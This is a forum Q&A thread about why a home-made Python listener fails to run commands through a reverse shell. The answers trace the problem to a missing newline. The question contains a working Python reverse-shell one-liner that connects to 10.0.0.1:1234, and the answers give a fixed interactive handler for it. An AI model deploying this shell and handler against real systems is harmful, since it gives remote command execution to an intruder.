I had a doubt regarding one of my reverse shells I tried locally:
After manually trying the steps to get an interactive shell with the following reverse shell:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
I tried to write a Python server that would automate this:
# coding: utf-8
import socket
socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  # note: shadows the socket module
socket.bind(('', 1234))
socket.listen(1)
client, address = socket.accept()
print("{} connected".format(address))
while True:
    print(client.recv(2048))  # this showed me I had a shell
    client.send(input("").encode('utf-8'))
client.close()
socket.close()
Can someone figure out why my commands are not executed even though the shell is launched (client side)?
Thanks.
CodePudding user response:
client.send(input("").encode('utf-8'))
input() will strip the newline from the input it reads. The shell, though, expects a command to end with a newline. The fix is thus to add the missing newline:
client.send(input("").encode('utf-8') + b"\n")
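To see the newline point in isolation, here is an added example (not part of the original answer) that feeds the same command to a local, non-interactive /bin/sh over a pipe, once without and once with the trailing newline, and waits a bounded time for output instead of blocking on read the way recv() does in the question's handler. It assumes a POSIX system with /bin/sh; the inputs are constructed.

```python
import select
import subprocess


def shell_output(data: bytes, timeout: float = 1.0) -> bytes:
    """Write raw bytes to a fresh /bin/sh and return whatever it prints
    within `timeout` seconds (b"" if nothing).

    A shell reads its input line by line: bytes that are not terminated
    by "\n" stay in its input buffer and are never executed, which is
    exactly what happens when input() strips the newline before send().
    """
    proc = subprocess.Popen(
        ["/bin/sh"],                     # non-interactive: no prompt noise
        stdin=subprocess.PIPE,
        stdout=subprocess.PIPE,
        stderr=subprocess.STDOUT,
    )
    try:
        proc.stdin.write(data)
        proc.stdin.flush()
        # Bounded wait: select() tells us whether anything is readable,
        # so a silent shell does not hang the caller forever.
        ready, _, _ = select.select([proc.stdout], [], [], timeout)
        return proc.stdout.read1(4096) if ready else b""
    finally:
        proc.kill()
        proc.wait()


def demo():
    # Constructed inputs: the same command with and without the newline.
    without_newline = shell_output(b"echo hello")      # returns b""
    with_newline = shell_output(b"echo hello\n")       # returns b"hello\n"
    return without_newline, with_newline


if __name__ == "__main__":
    no_nl, nl = demo()
    print("without newline:", no_nl)
    print("with newline:   ", nl)
```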
CodePudding user response:
- First, the variable names should not be the same as the library names.
- The server first expects some data, but there is no data to come. That's why the problem occurs.
- Since you are connecting directly to the shell, you must use a newline specifier, i.e. '\n', every time data is sent.
- Each time data is sent, you have to wait a little while to fetch the data. If you don't wait, there will be a problem because you are trying to pull the data before the code is run on the other side.
- You need to decode the incoming data.
- Closing the client and socket will not work, because it will never exit the while loop and the code below will not run. You can add a check for that: for example, when you type 'exit', the loop will end.
The code should be at least like this:
import socket
import time

def interact(client):
    command = ''
    while command != 'exit':
        command = input('$ ')
        # the remote shell only runs a command once it sees the newline
        client.send((command + '\n').encode('utf-8'))
        time.sleep(0.5)  # give the other side time to execute before reading
        print(client.recv(2048).decode('utf-8'))
    client.close()
    return

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('', 1234))
s.listen(1)
client, addr = s.accept()
print("{} connected".format(addr))
interact(client)